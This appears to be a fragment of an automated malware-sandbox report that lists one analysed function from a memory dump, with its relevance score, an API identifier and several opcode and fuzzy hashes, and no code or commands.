                                          Uniqueness Score: -1.00%

                                          Function 004096FB, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                          • Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
                                          • Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                          • Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
                                          Uniqueness

                                          Uniqueness Score: -1.00%